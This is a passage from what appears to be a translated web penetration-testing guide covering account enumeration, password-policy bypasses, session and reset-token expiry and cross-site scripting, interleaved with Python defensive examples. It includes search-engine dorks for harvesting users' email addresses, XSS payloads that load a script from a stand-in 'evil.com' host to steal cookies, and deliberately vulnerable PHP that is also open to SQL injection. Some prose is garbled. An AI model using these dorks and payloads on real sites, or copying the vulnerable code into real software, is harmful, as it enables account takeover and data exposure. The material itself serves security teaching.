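    return "OK"


def login_hardened(email: str, password: str) -> str:
    """One failure message, and the password hash is computed even for
    unknown accounts so the response time is the same in both cases."""
    user = USERS.get(email)
    stored = user["hash"] if user else _DUMMY_HASH
    match = hmac.compare_digest(_pw_hash(password), stored)
    if user is None or not match:
        return "Invalid email or password"
    return "OK"


def resend_vulnerable(email: str) -> bytes:
    """Three states, three bodies of different length: the 571 / 406 response
    lengths in the Xoom case are exactly this kind of oracle."""
    user = USERS.get(email)
    if user is None:
        return b'{"error":"Account not found"}'
    if user["activated"]:
        return b'{"error":"The account has been activated"}'
    SENT_MAIL.append(email)
    return b'{"status":"sent"}'


def resend_hardened(email: str) -> bytes:
    """Same body, same length, for every state; the mail is sent (or not)
    as a side effect that the HTTP response never reflects."""
    user = USERS.get(email)
    if user is not None and not user["activated"]:
        SENT_MAIL.append(email)
    return (b'{"status":"If this address is registered and not yet activated, '
            b'a new activation link has been sent."}')


def distinct_lengths(handler: Callable[[str], bytes], emails: List[str]) -> int:
    """Number of different response lengths a handler produces for the given
    inputs; a handler that cannot serve as an oracle returns 1."""
    return len({len(handler(e)) for e in emails})
```

The distinct_lengths check is the kind of regression test worth keeping for every account-related endpoint (login, forgot password, resend confirmation, sign-up): run it with one registered, one pending and one unknown address, and fail the build if it ever returns more than 1.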

11.2.4. Account Enumeration by Using a Search Engine - Xoom Case

As is commonly known, the sign-up feature of an app will surely give an alert when a user wants to register with an already registered account. Usually, this alert will be information such as "your account has been registered" or the like. But seen from the other side, this sort of thing of course gives a tester the potential to enumerate the registered accounts in the application massively.

For prevention, there are several approaches developers use to anticipate this, such as using a CAPTCHA. Another example often used besides installing a CAPTCHA is to provide a kind of soft token that is only valid for one request. The goal is quite simple: a tester would not be able to automate the enumeration activity with only one soft-token value.

The Xoom application (a PayPal company) takes a different approach to preventing enumeration at sign-up. In this condition, when a tester wants to register an email at Xoom, whether or not it is already registered, Xoom keeps giving the same response, which does not look like "success", and instead continues the registration process directly via the email being registered.

• When an account is not registered, the application sends (via email) a unique link that can be used to activate the account.

• As for when an account has already been registered, the application sends (also via email) a notice that a registration attempt was made with that email address.

In essence, nothing needs to be done by the email owner when the account has already been registered beforehand. But from the testers' standpoint, they are given the "impression" that they have gained nothing.

In this condition, it can be seen that when there is account enumeration prevention, the account is something that is considered "should be kept secret" from the viewpoint of the company in question.

Reflecting on this situation, one of the ways a tester can enumerate accounts is to use search engines, as was presented in general in "Information Disclosure via Search Engine".

Armed with some dorks, the email addresses of registered users at Xoom could finally be enumerated "well":

site:xoom.com AND inurl:'@gmail.com'
site:xoom.com AND inurl:'@yahoo.com'
site:xoom.com AND inurl:'@hotmail.com'
site:xoom.com AND inurl:'@msn.com'

Here are some results of the enumeration that was done:

Figure 135 Information Disclosure via Search Engine - Email Enumeration

Figure 136 Information Disclosure via Search Engine - Email Enumeration


In a more specific conditions, of course, it is better to use Google Dork also

involve parameters that have content "email" is.

As simple information, Xoom has a link to "referrer" program as follows:

http://refer.xoom.com/micro/expired_link?f=Complete_Name& e = email@address.com & l = Another_N

ame & tellapal.id = Some_of_Token

From this link, then of course you can add a few more parameters for input early Google Dork

as part of the activities enumerated. As exemplarily are as follows:

site : xoom.com AND inurl : ' e = '' refer '

site : xoom.com AND inurl : ' tellapal.id '

Thus, the email addresses of users of the application (application vulnerable) was

will be obtained with the use of Google Dork testers.

11.2.5. Enumeration account via Sign Up Feature - HackerOne Case

It was previously discussed that developers prevent enumeration at sign up by implementing a soft token that can only be used once per request.

When an application has no soft token or other precaution, the examiner can use the sign up feature to enumerate accounts and observe the generated responses, as described in the previous sections.

One example of this is the finding of a researcher with the nick dawidczagan in HackerOne's program. At that time, HackerOne had already implemented prevention of account enumeration via the password reset feature and the login form. However, HackerOne's registration process still allowed testers to enumerate.

However, from HackerOne's standpoint this was not a risky issue at the time, because they had internal considerations in dealing with this case.

11.3. Reference Check for Account Enumeration

The execution of account enumeration, and the related prevention, is certainly not limited to what has been presented in this guide. However, it is expected to give testers a picture that every flow in an application that relates to accounts has at least a small possibility of being used for enumeration. Some examples are enumeration through additional account features (as in the Weblate case found by atruba) or by exploiting an IDOR-related vulnerability (the IDOR concept is described later).

To complement the existing explanation, here are some references that can be checked for discussion related to account enumeration:

• OWASP Testing Guide - Testing for User Enumeration and Guessable User Account: https://www.owasp.org/index.php/Testing_for_User_Enumeration_and_Guessable_User_Account_(OWASP-AT-002)

• About User Enumeration: https://blog.rapid7.com/2017/06/15/about-user-enumeration/

• [Infogram] User Enumeration via Forgot Password Feature: https://hackerone.com/reports/280509

• [Veris] User Enumeration via Error Message at Login Form: https://hackerone.com/reports/123496

• [HackerOne] Enumeration of Users via Registration (Sign Up) Feature: https://hackerone.com/reports/761

• [Weblate] User Enumeration when Adding Email to Account: https://hackerone.com/reports/223531

• [Xoom] Account Enumeration via Search Engine: http://firstsight.me/2017/12/information-disclosure-at-paypal-and-Xoom-paypal-acquisition-via-search-engine/


12. COMMON ACCOUNT AND PASSWORD CHECKING

This section is one of the easiest parts of the test. More specifically, this section is mostly an examination of the policies applied in an application, such as the password length setting, the rules on the use of complex passwords, the password age, and the like.

While this will not often be accepted in the industry, this guide still includes it because there are still some types of companies that consider it a concern.

Note: Since this test category is fairly easy, this section will not include many screenshots of the execution.

12.1. Password Complexity Checking

The complexity of a password can certainly be of particular concern in the account creation mechanism. As a best practice, a reasonably good password must at least contain a combination of lowercase letters, uppercase letters and numbers. In most other opinions, a symbol is also a necessity in that combination.

However, there is another condition that determines whether a password counts as complex, namely that the complexity itself does not belong to the weak category. For example, P@ssw0rd is a password with a perfect mix of characters, namely uppercase letters, lowercase letters, numbers and symbols. However, this password must still be considered weak because of its characteristics (it is known by many people).

Based on this consideration, complexity in this case is more appropriately defined as the password not being classified as a weak or common password, and even better if it belongs to the passwords that are difficult to read with the naked eye.

12.1.1. Password Complexity Check via Registration Feature

The easiest way to perform this check is through the registration process, which is generally freely available. In practice, the tester simply enters a single character, or only lowercase letters, as the password. When the server accepts this, it can be confirmed that the application does not apply a password complexity policy.


12.1.2. Password Complexity Check via the Change Password Feature

When password complexity has been applied to the registration feature, is it no longer possible to find an issue related to it in the intended application? The answer is: not necessarily.

This can be seen from a write-up published by a researcher with the nick wdem (Walentin Helling) on ownCloud's program. On that occasion, wdem showed that the password complexity policy applied by ownCloud (e.g. when registering) could be "bypassed" by using the available change password feature. What he did was change his password to "q" (a single character, which certainly falls into the not-complex category).

Figure 137 Simple Step Conducted by wdem

12.1.3. Password Complexity Check via the Change Password Feature from Reset Password

A researcher with the nick japz managed to find a unique way to bypass the complex password requirement of the change password feature in Legal Robot's program. As stated in the description, japz first used the password reset feature, which was then followed by entering a new password that was not complex.

Figure 138 Password Complexity is not Implemented at Change Password from the Password Reset Feature


12.1.4. Password Complexity Check via the Use of Specific Characters

There is a fairly unique case related to password complexity checking. It can be seen from the write-up released by a researcher with the nick rpkumar on Legal Robot's program. On that occasion, Legal Robot actually had a rule in place to stop users from creating passwords that are not complex; nevertheless, rpkumar managed to bypass it using only eight consecutive "space" characters.

Figure 139 Bypass Password Complexity with Empty Spaces

12.2. Minimum Password Length Checking

In addition to complexity, something generally considered in testing is the minimum length of the passwords in use. As a best practice, the minimum length varies: 7 (seven), 8 (eight), 12 (twelve) characters, or perhaps more. So there is no separate requirement to use the "longest" reference.

The test itself is not much different from what has been described previously, namely:

• Examination via the Registration Feature;

• Examination via the Change Password Feature; and

• Examination via the Change Password Feature from Reset Password.

One example that can be brought up again here is when japz successfully bypassed the minimum password length of 8 (eight) characters down to six (6) characters through the use of the change password feature reached from the password reset.

Figure 140 Bypass Minimum Password Length Policy


Figure 141 Bypass the Minimum Password Length Policy II

A simple note: the longer the password length enforced in an application, the harder it will be for an attacker to guess (e.g. with a brute force attack) the password used to log in to the related application.
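The cases in 12.1 and 12.2 all come down to one policy being enforced on one path (registration) and skipped on another (change password, reset password). As an added example that is not part of the book, here is a single Python policy function that every password-setting path calls; the rules, the minimum length of 8 and the short common-password list are assumptions for illustration.

```python
import re
from typing import List

# Constructed sample of a common-password deny list; a real deployment would
# load a much larger list (for example from a breach corpus).
COMMON_PASSWORDS = {"password", "p@ssw0rd", "123456", "qwerty", "letmein"}

MIN_LENGTH = 8  # assumed policy value


def check_password_policy(password: str) -> List[str]:
    """Return the list of policy violations; an empty list means accepted.

    The same function is meant to be called from the registration, change
    password and reset password handlers, so no path can skip the rules.
    """
    problems: List[str] = []

    # Whitespace is stripped before the length check so that a run of spaces
    # (the rpkumar case) cannot satisfy the length or complexity rules.
    stripped = password.strip()
    if re.fullmatch(r"\s*", password):
        problems.append("password consists only of whitespace")
    elif stripped != password:
        problems.append("leading/trailing whitespace is not allowed")

    if len(stripped) < MIN_LENGTH:
        problems.append(f"shorter than {MIN_LENGTH} characters")

    # Character-class rules: lowercase, uppercase, digit and symbol.
    if not re.search(r"[a-z]", password):
        problems.append("no lowercase letter")
    if not re.search(r"[A-Z]", password):
        problems.append("no uppercase letter")
    if not re.search(r"[0-9]", password):
        problems.append("no digit")
    if not re.search(r"[^A-Za-z0-9\s]", password):
        problems.append("no symbol")

    # Complexity alone is not enough: P@ssw0rd passes every class rule above
    # but is on every wordlist, so the common-password check comes last.
    if stripped.lower() in COMMON_PASSWORDS:
        problems.append("password is on the common-password list")

    return problems


def set_password(path: str, password: str) -> bool:
    """Handler body shared by all three paths; True only if the policy passes."""
    violations = check_password_policy(password)
    if violations:
        print(f"[{path}] rejected: {', '.join(violations)}")
        return False
    print(f"[{path}] accepted")
    return True


if __name__ == "__main__":
    # The three paths from the write-ups above, each routed through the same check.
    set_password("registration", "P@ssw0rd")     # complex-looking but common
    set_password("change-password", "q")         # the wdem case
    set_password("reset-password", " " * 8)      # the rpkumar case
    set_password("registration", "Tr0ub4dor&3x")  # accepted
```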

12.3. Minimum Password History Checking

This part is fairly debated because there are two different points of view, namely:

• The first is more about the negative side. Saving passwords (in the form of history) will only add to the sensitive material stored in the database. When the system is hacked, an attacker would gain "more" sensitive material, because there is more than one password for a single user.

• The second relates to the positive side. For example, a system has implemented a maximum password change time of 30 (thirty) days, a limit of six (6) login attempts, and a temporary lock of 30 (thirty) minutes. When brute force is the only way available to the attacker, the attacker can "only" try around 8640 (eight thousand six hundred forty) combinations within the period of 30 (thirty) days in question.

Regardless of the pros and cons, this guide will try to discuss briefly (remember, not too deeply) the things that exist.

Of course, a tester who already has an account (whether the account was given by the company or obtained by registration) can try to change the password on the related available feature. If the tester has not yet reached a certain point (e.g. four changes, in accordance with the PCI DSS reference) but is still able to change the password back to a previous one, then of course this will be a finding of its own.

However, keep in mind that not all companies will implement this policy, as they basically have their own considerations from both the business and the technical side.


12.4. Maximum Password Age

Just as before, not all companies will implement this policy, in view of their own considerations.

Apart from those considerations, this reference point is quite difficult to prove directly from the front end, because it requires a view of the implementation. However, an examiner who has direct access to the database can try to change the time of the last password change to see whether or not the password age limitation feature is working.

Technically, this time change can also be observed under several conditions:

• Change the time of the last password change, so the tester only needs to wait (for example) a few minutes to get the answer on whether the feature works;

• Or change the rules in the application, provided this is available on a dashboard and does not require changing code directly;

• And of course there are many other creative ways, or ways unthought of when this guide was created.

As for the time limit, the examiner can look at some of the standards, such as those issued by PCI DSS (90 days) or Microsoft (between 30 days and 90 days).

12.5. Change Password for the First Time Use

This point will probably be one of the points with the shortest explanation.

Technically, this point is not intended for systems that let users register themselves. The right circumstance to apply this point is when a user's password is generated by another party, such as an administrator, customer service, or others.

12.6. Reference for Common Account and Password Checking

In order to expand on the insights related to this, the following are some references that can be checked regarding the discussion of common account and password checking:


• [ownCloud] Password complexity not enforced on password change: https://hackerone.com/reports/276123

• [Legal Robot] Bypass 8 chars password complexity with 6 chars only due to insecure password reset functionality: https://hackerone.com/reports/173195

• [Legal Robot] Password Complexity ignores Empty Spaces: https://hackerone.com/reports/250253

• Authentication Cheat Sheet by OWASP: https://cheatsheetseries.owasp.org/cheatsheets/Authentication_Cheat_Sheet.html


SESSION MANAGEMENT MECHANISM


13. SESSION MANAGEMENT

It is undeniable that the session is something that attracts the attention of many testers. Another reason is that it allows someone to enter an account without the hassle of guessing the passwords used by each registered account.

Before going further, the testing of sessions has several steps, one of which relates to "Insecure Direct Object Reference (IDOR)". However, this guide will specifically separate IDOR into a sub-chapter of its own, so as not to be confusing when entering the discussion.

13.1. Session is not Expired - Hackerone and WakaTime Case

As a best practice, a session that has ended (either because it has reached its idle time period or because the user has exited / logged out of their account) should not be usable again. However, in reality, there is no doubt that there are still developers who miss implementing this best practice, especially in a newly released application.

Some examples were shown by a researcher named satishb3 (on HackerOne's program in 2013) and pratyushjanghel (on WakaTime's program in 2017).

In the execution, the examiner only needs to capture a valid request (in the logged-in state) and study the state of its response. The details are as follows:

• Log in to a valid account;

• Go to a menu that can only be accessed by an authorized account (in this case it can be the user's own profile page);

• Then "capture" the request from the previous point and send it to the "repeater" in Burp Suite (recall the learning steps in the sub-chapter "Burpsuite - Repeater Mode" described previously);

• After that, log out of the application;

• Then resend the request that was captured and placed in the "repeater". To be sure, this request can be sent along with some changes in the data. When the data changes, the "session is not expired" issue exists in the application being tested.


It should be noted that in most forms of testing, the "session is not expired" issue can also "apply" within a period of time (such as 15 minutes).
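The replay check above only fails when the server itself forgets the session. As an added example that is not from the book, here is a minimal server-side session registry in Python in which logout deletes the record and an idle timeout (assumed here to be the 15 minutes mentioned above) expires it, together with a function that performs the tester's capture, logout and resend check against it.

```python
import secrets
import time
from typing import Dict, Optional

IDLE_TIMEOUT_SECONDS = 15 * 60   # assumed idle period for this example


class SessionStore:
    """Server-side session registry: a session id is only valid while its
    record is present here, so logout and idle timeout make a replayed
    request fail regardless of what the browser still holds."""

    def __init__(self, now=time.time):
        self._now = now                        # injectable clock for testing
        self._sessions: Dict[str, dict] = {}   # session id -> record

    def login(self, username: str) -> str:
        sid = secrets.token_urlsafe(32)        # unguessable identifier
        self._sessions[sid] = {"user": username, "last_seen": self._now()}
        return sid

    def logout(self, sid: str) -> None:
        # Deleting the record is what actually ends the session; only
        # clearing the cookie client-side would leave a captured request usable.
        self._sessions.pop(sid, None)

    def authenticate(self, sid: str) -> Optional[str]:
        """Return the username for a live session, or None when the request
        must be rejected (unknown, logged-out or idle-expired session)."""
        record = self._sessions.get(sid)
        if record is None:
            return None
        if self._now() - record["last_seen"] > IDLE_TIMEOUT_SECONDS:
            self._sessions.pop(sid, None)     # expire on first use after idle
            return None
        record["last_seen"] = self._now()
        return record["user"]


def replay_after_logout(store: SessionStore) -> bool:
    """The tester's check from 13.1: capture a request while logged in, log
    out, resend it. Returns True if the replay is still accepted (bug present)."""
    sid = store.login("tester")
    captured_cookie = sid                      # the captured request carries this
    assert store.authenticate(captured_cookie) == "tester"
    store.logout(sid)
    return store.authenticate(captured_cookie) is not None


if __name__ == "__main__":
    print("replay accepted after logout:", replay_after_logout(SessionStore()))
```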

13.2. Cookie Attributes are not yet Set Up

13.2.1. Few Words about Using Cookies to Login

Is it possible for someone to log in to (and obtain authorization from) an application using only a cookie? The answer is certainly yes, it is possible.

In short, every user who has obtained authorization will receive a cookie whose role is to "remember" the active activity being carried out by the user. Quoting Wikipedia, cookies are also used to remember pieces of information previously entered by the user into a form, such as a name, complete address, password, as well as data such as credit card numbers.

Seeing this condition, it is certain that an attacker who has successfully taken an active cookie from a user will be able to perform activities as the legitimate user. To overcome this, developers also implement several things that can be used to protect against the theft of a cookie.

To simplify the explanation, the authors will draw on an interesting article by Dawid Czagan regarding "Securing Cookies with HttpOnly and Secure Flags".

13.2.2. Few Words about "Secure" Flag / Attribute at Cookies

In the same article, it is explained that the "secure" flag on cookies is necessary to "force" the cookie to be sent via HTTPS only, even though the application can also be run over HTTP. Thus, these cookies become "illegible" even if an attacker tries to sniff them.

13.2.2.1. Check for "Secure" Flag at Cookies Attribute - IRCCloud and Gratipay Case

Some examples that can be presented in this section are the vulnerabilities reported by a researcher with the nick eronx (on IRCCloud's program in 2014) and a researcher with the nick staytuned (on Gratipay's program in 2015).

In its implementation, this test is fairly simple. An examiner only needs to "login" first to an application (thereby obtaining authorization) and look at the flags active on the cookies by using the built-in "web developer" features of either Firefox or Chrome, or by using the "Edit This Cookie" extension developed by editthiscookie.com. Here is an example of the examination using the related extension:

Figure 142 Executing "Edit This Cookie" Extension

Figure 143 Cookies Attribute at Hackerone


13.2.3. Few Words about "HTTP-Only" Flag / Attribute at Cookies

Still referring to Dawid Czagan's article, there is an interesting question that could be asked to open this part: "If a cookie is only transmitted over HTTPS, then what is the purpose of the 'HttpOnly' flag?"

The answer has been properly given there. In reality, the techniques for stealing cookies are not limited to eavesdropping (one of which is sniffing). An attacker could also exploit a vulnerability such as XSS (Cross Site Scripting) in the application to steal an active cookie.

In anticipation of this, an application can implement the HttpOnly flag on the cookie attributes. With this in place, JavaScript (executed through an XSS attack) will not be able to read the user's active cookies.

13.2.3.1. Check for "HttpOnly" Flag at Cookies Attribute - Qiwi and Concrete5 Case

Some examples that can be presented in this section are the vulnerabilities reported by a researcher with the nick pradeepch99 (on QIWI's program in 2015) and a researcher with the nick tomdev (on concrete5's program in 2016).

Just like the previous step, a tester can use a browser extension such as "EditThisCookie".

Here is a screenshot of pradeepch99's proof, on one application owned by Qiwi that at the time had not set the "HttpOnly" flag (and had not yet set the "Secure" flag either).

Figure 144 Cookies Flag / Attribute is not yet setup
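What the extension shows for one cookie can also be checked over every Set-Cookie header of a response. As an added example (not from the book or from the tools it mentions), here is a small Python parser that reports which of the "Secure" and "HttpOnly" flags from 13.2.2 and 13.2.3 are missing, beside a helper that emits the corrected header; the response text and cookie names are constructed samples.

```python
from typing import Dict, List

# Constructed sample response head: a session cookie with no attributes (the
# weak form seen in the QIWI screenshot), one with only Secure, and one correct.
SAMPLE_RESPONSE = """HTTP/1.1 200 OK
Content-Type: text/html
Set-Cookie: sessionid=abc123; Path=/
Set-Cookie: csrftoken=t0k3n; Path=/; Secure
Set-Cookie: lang=en; Path=/; Secure; HttpOnly
"""

REQUIRED_FLAGS = ("Secure", "HttpOnly")


def parse_set_cookie(header: str) -> Dict[str, object]:
    """Parse one Set-Cookie header (with or without the 'Set-Cookie:' prefix)
    into {name, value, attrs}; attrs maps lower-cased attribute names to their
    value, or to True for bare flags such as Secure and HttpOnly."""
    if header.lower().startswith("set-cookie:"):
        header = header.split(":", 1)[1]
    parts = [p.strip() for p in header.split(";") if p.strip()]
    name, _, value = parts[0].partition("=")
    attrs: Dict[str, object] = {}
    for part in parts[1:]:
        key, has_value, val = part.partition("=")
        attrs[key.strip().lower()] = val.strip() if has_value else True
    return {"name": name.strip(), "value": value, "attrs": attrs}


def missing_flags(header: str) -> List[str]:
    """Return the required flags that are absent from one Set-Cookie header."""
    attrs = parse_set_cookie(header)["attrs"]
    return [flag for flag in REQUIRED_FLAGS if flag.lower() not in attrs]


def audit_response_headers(raw_headers: str) -> Dict[str, List[str]]:
    """Check every Set-Cookie line of a raw response head.
    Returns cookie name -> list of missing flags (empty list = fine)."""
    report: Dict[str, List[str]] = {}
    for line in raw_headers.splitlines():
        if line.lower().startswith("set-cookie:"):
            report[parse_set_cookie(line)["name"]] = missing_flags(line)
    return report


def build_session_cookie(name: str, value: str) -> str:
    """The corrected form: a session cookie carrying both flags."""
    return f"Set-Cookie: {name}={value}; Path=/; Secure; HttpOnly"


if __name__ == "__main__":
    for cookie, missing in audit_response_headers(SAMPLE_RESPONSE).items():
        print(f"{cookie}: {'missing ' + ', '.join(missing) if missing else 'ok'}")
    print(build_session_cookie("sessionid", "abc123"))
```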


13.3. Unexpired Reset Password Link

In accordance with the names of the vulnerabilities, this point is divided into four sections in outline, namely:

• Reset Password Link never expires even though it has not been used for a long time;

• Reset Password Link never expires even though it has already been used;

• An unused Reset Password Link sent to an email account does not expire even though the user has used a reset password link that "came later";

• An unused Reset Password Link sent to an email account does not expire even though the email account has been replaced from its original value.

This point is also relatively easy to execute, but, returning to the common problem presented at some earlier points, not all programs will accept this related issue. This is because the attack vector can be quite difficult to "fulfil", for example:

• An attacker must first hack the user's account to be able to find the full "value" of a password reset link; or

• An attacker might come from the internal side that manages the database directly, so that they can see the token value directly and use it illegally.

However, to complete the discussion thoroughly, this guide will still provide an overview of these issues.

Before moving to further discussion, it should be noted that the "Reset Password Link" meant here is a link that contains a unique token.

13.3.1. Unexpired Reset Password Link - Never Used - Veris Case

As a best practice, a unique link used to reset the password of an account should expire. For example, an application has a rule that a reset password link is only valid for 24 (twenty four) hours. So, if the link is used after more than 24 hours, the link in question expires and the user is required to make a new request to be able to reset their password.

In June 2016, a researcher named Itly found this issue in Veris' program. Technically, Veris had a policy that the password reset link could only be used within a period of 30 minutes. But in fact, the link in question could still be used even after 2 hours.

The execution steps are quite simple, namely:

• Request a new password by using the password reset feature;

• When the link with the unique token arrives in the user's email, wait until a certain deadline has passed. Say the limit is 30 minutes; then use the token after (for example) 1 hour.

13.3.2. Used Reset Password Link is Never Expired - WakaTime Case

The opposite of the previous point: here the problem arises when a password reset link that has already been used can be reused. In other words, the unique link never expires and has no provision limiting its use (so it can be used repeatedly).

In one bug-hunting activity, a researcher named mohammad_obaid managed to find this issue in WakaTime's program.

The execution steps are also fairly simple, namely:

• Request a new password by using the password reset feature;

• Use the password reset link sent to the user's email to replace the old password with a new one;

• Afterwards, reuse the same password reset link to change the password again. If it can still be used, the application is vulnerable to this point.

13.3.3. 1st Reset Password Link is not Expired after Using the 2nd Link - Few Cases

For the third part, the discussion will focus on a reset password link that is still active even though the user has already used the most recently issued reset password link to replace their password.

It sounds a bit difficult, but the concept is simple:

• The tester simply requests a password reset link twice (thus producing token1 and token2).

• Then, the tester directly uses the password reset link that came last (in this case token2) to change the password.

• Thereafter, token1 is reused to change the password again. If the value of token1 still works, it means the application is "vulnerable" to the pattern in this point.

To give a picture of this point, the releases of some researchers can serve as references, namely geekninja (Infogram's program), Hk755a (Yelp's program), and mohammad_obaid (WakaTime's program).

13.3.4. Reset Password Link did not Expire after Changing Email Address - WakaTime Case

In this section, the problem refers to a reset password link that does not expire even though someone has changed their registered email.

Why is this a problem? Because in general a password reset link is tied to a specific email (which must be combined with various other formulas). When a user has replaced their email but can still replace the password with a password reset link from the previous email, then that is an issue of its own.

This is in line with a write-up released by a researcher named silv3rpoision on WakaTime's program. Although the email had been replaced first, silv3rpoision could still use the old password reset link to change the password.

The steps required to execute this issue are also fairly simple, namely:

• Make a password reset request with the initial email account (say EMAILA);

• Then, change the email on the account to EMAILB;

• Afterwards, use the password reset link generated in the first point to replace the password of the associated account. If it can still be used, then this can be an issue.
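The four patterns in 13.3.1 to 13.3.4 are all properties of how the server keeps its reset tokens. As an added example that is not part of the book or of any program named above, here is a Python token store that enforces all four: a 30-minute lifetime (the Veris limit, assumed as the policy value here), single use, invalidation of every older token of the user once a newer one is consumed, and rejection once the account email changes; it also stores only a hash of each token, so an insider reading the database does not obtain usable links.

```python
import hashlib
import secrets
import time
from dataclasses import dataclass
from typing import Dict, Optional

RESET_TOKEN_TTL_SECONDS = 30 * 60   # assumed policy: 30-minute validity


@dataclass
class ResetToken:
    user_id: str
    email: str          # the address the link was sent to when issued
    issued_at: float
    used: bool = False


class ResetTokenStore:
    """Server-side reset-token registry enforcing the four rules of 13.3."""

    def __init__(self, now=time.time):
        self._now = now                               # injectable clock
        self._tokens: Dict[str, ResetToken] = {}      # sha256(token) -> record
        self._user_email: Dict[str, str] = {}         # user_id -> current email

    @staticmethod
    def _digest(token: str) -> str:
        return hashlib.sha256(token.encode()).hexdigest()

    def set_email(self, user_id: str, email: str) -> None:
        """Called by the change-email feature (EMAILA -> EMAILB in 13.3.4)."""
        self._user_email[user_id] = email

    def issue(self, user_id: str) -> str:
        """Create a fresh token bound to the user's current email. The raw
        token goes into the emailed link; only its hash is kept here."""
        token = secrets.token_urlsafe(32)
        self._tokens[self._digest(token)] = ResetToken(
            user_id, self._user_email[user_id], self._now())
        return token

    def _invalidate_all_for(self, user_id: str) -> None:
        for record in self._tokens.values():
            if record.user_id == user_id:
                record.used = True

    def consume(self, token: str) -> Optional[str]:
        """Return the user_id if the link is accepted, else None. Accepting a
        token retires every outstanding token of that user."""
        record = self._tokens.get(self._digest(token))
        if record is None or record.used:
            return None                              # unknown or reused (13.3.2)
        if self._now() - record.issued_at > RESET_TOKEN_TTL_SECONDS:
            return None                              # past its lifetime (13.3.1)
        if record.email != self._user_email.get(record.user_id):
            return None                              # email changed since (13.3.4)
        self._invalidate_all_for(record.user_id)     # token1 dies with token2 (13.3.3)
        return record.user_id


if __name__ == "__main__":
    clock = [0.0]
    store = ResetTokenStore(now=lambda: clock[0])
    store.set_email("u1", "EMAILA")
    token1, token2 = store.issue("u1"), store.issue("u1")
    print("token2 accepted:", store.consume(token2) == "u1")
    print("token1 still works:", store.consume(token1) is not None)   # False
```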

13.4. Reference for Session Management

In order to expand on the insights related to this, the following are some references that can be associated with the discussion of session management:


• Securing Cookies with HttpOnly and Secure Flags: https://resources.infosecinstitute.com/securing-cookies-httponly-secure-flags/#gref

• [HackerOne] Session not Expired on Logout: https://hackerone.com/reports/353

• [WakaTime] Session not Expired on Logout: https://hackerone.com/reports/244875

• [IRCCloud] Unsecure Cookies, Cookie Secure Flag not set: https://hackerone.com/reports/6877

• [Gratipay] Cookie Does Not Contain The "secure" Attribute: https://hackerone.com/reports/123849

• [QIWI] Session Cookies without HttpOnly and Secure Flag Set: https://hackerone.com/reports/75357

• [Concrete5] HttpOnly flag not set for Cookie on concrete5.org: https://hackerone.com/reports/4792

• EditThisCookie Extension for Google Chrome: https://chrome.google.com/webstore/detail/editthiscookie/fngmhnnpilhplaeedifhccceomclgfbg?hl=en

• Details of HttpOnly from OWASP: https://www.owasp.org/index.php/HttpOnly

• Details of the Secure Flag from OWASP: https://www.owasp.org/index.php/SecureFlag

• [Veris] Unused Reset Password Link is not Expired after the Expiry Time: https://hackerone.com/reports/118948

• [WakaTime] Used Reset Password Link is Never Expired: https://hackerone.com/reports/244642

• [Infogram] 1st Reset Password Link is not Expired after Using the 2nd Link: https://hackerone.com/reports/283550

• [Yelp] 1st Reset Password Link is not Expired after Using the 2nd Link: https://hackerone.com/reports/170161

• [WakaTime] 1st Reset Password Link is not Expired after Using the 2nd Link: https://hackerone.com/reports/244642

• [WakaTime] Reset Password Link did not Expire after Changing Email Address: https://hackerone.com/reports/244612


INPUT VALIDATION


14. CROSS SITE SCRIPTING (XSS)

XSS (Cross Site Scripting) is a type of vulnerability that is quite often found in web-based applications. In general, by its very nature this vulnerability has an impact on the client, and it is usually executed by injecting JavaScript or HTML code.

Statistically, XSS is a fairly popular type of vulnerability. This can be seen from the OWASP Top 10 report, which shows XSS at rank A7, and, according to a whitepaper released by Rapid7, Cross Site Scripting occupied the first rank in Q2 2018.

Figure 145 Statistic of XSS (OWASP and Rapid7)

XSS attacks occur because the input validation in an application is not performed well, "supported" by output that reflects the input directly. In other words, this kind of vulnerability allows the attacker to enter code (such as JavaScript) that can be made to undergo a dangerous execution, for example:

<script>location.href="https://www.evil.com/malware.exe";</script>

In reality, the impact of XSS attacks is fairly varied and has varying levels of risk. Some of them are the attacker taking the victim's cookies or tokens to obtain login access, forcing the victim to visit a "dangerous" site, and making the victim download malware.

Technically, XSS has three types of attack, consisting of reflected cross-site scripting, stored cross-site scripting, and DOM-based cross-site scripting. Each variant has a slightly different way of exploitation and a different risk level.


14.1. Kinds of Cross Site Scripting

14.1.1. Reflected Cross Site Scripting

In this type, the script input by the attacker is not stored in the database. Specifically, these attacks often occur with the HTTP GET method. Because it is not stored in the database, the impact on the user is "produced" indirectly. Therefore, to make this attack succeed, the attacker needs to combine it with an attack such as social engineering. Here is an example of the code of a search feature that is vulnerable to an XSS attack:

<?php
// the "search" query parameter is taken as-is, without validation or filtering
$find = $_GET['search'];
// ... and echoed straight back into the page
echo "Search: " . $find;
?>

Consider the example code above: any data entered through the GET method in the "search" parameter will be held in a variable. The data collected in this variable is processed without going through any validation and filtering stages. Afterwards, the data is displayed using the echo command as it is.

Under these conditions, a reflected XSS attack can happen because of the lack of validation on input and output. Then how can this attack be made to "function" while by nature it is not stored in the database?

As mentioned earlier, this attack needs to be combined with a social engineering type of attack. To make it easier, take a look at the following simple scenario:

• There is a vulnerability in the site xyz.com with a parameter named p1 that is vulnerable to a reflected XSS attack. The normal full link is: http://xyz.com?p1=hello

• On this occasion, the tester tries to enter a simple script of the form <img src=x onerror=http://evil.com/attack.js> placed in the parameter p1.

• Thus, the full link that has been injected becomes: http://xyz.com?p1="><img src=x onerror=http://evil.com/attack.js>

• When the link is visited, the visitor automatically executes the script in attack.js (whose functions can of course vary according to a predetermined function).

• Given that this link is a custom link and is not stored in the database, an additional "step" is certainly needed to make the victim execute it. In this case, the additional steps generally revolve around social engineering, such as sending the "complete" link via chat messaging, putting it on a forum / social media, email, and more.

Figure 146 Sample of Attack - Reflected XSS via Malicious Email

• If the victim is in a state log on the web xyz.com (and let's say that attack.js

is a script to pull the cookies), then there is the victim cookies can be taken

over by the attacker so that it can be used to login without a username and password.

Note: Image taken from blog shieldfy.io ,

14.1.2. Stored Cross Site Scripting

Unlike the previous type, in Stored XSS the script entered by the attacker is kept in the database (it is called "stored" because it is "saved"). In the usual case, the attacker injects malicious code through an input feature whose purpose is to store data, and then waits until another user (the victim) loads the output generated from that input.

Technically, the following is one example of code vulnerable to Stored XSS. The feature used for this example is a comment feature:

<?php

// store the submitted data in the database (no validation or filtering)
$name    = $_POST['name'];
$comment = $_POST['comment'];
$store   = $mysqli->query("INSERT INTO tb_komentar (name, comment) VALUES ('$name', '$comment')");

// read the data back and print it on the web page exactly as stored
$result = $mysqli->query("SELECT * FROM tb_komentar");
while ($row = $result->fetch_assoc()) {
    echo "Comment: " . $row['name'] . " - " . $row['comment'];
}

?>

